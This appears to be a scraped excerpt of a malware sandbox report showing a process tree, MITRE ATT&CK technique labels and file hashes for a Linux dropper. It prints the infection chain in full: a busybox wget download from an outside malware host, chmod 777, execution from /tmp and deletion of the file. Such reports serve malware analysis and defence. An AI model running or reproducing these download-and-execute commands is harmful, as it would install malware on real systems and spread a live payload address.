/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:950
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:953
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97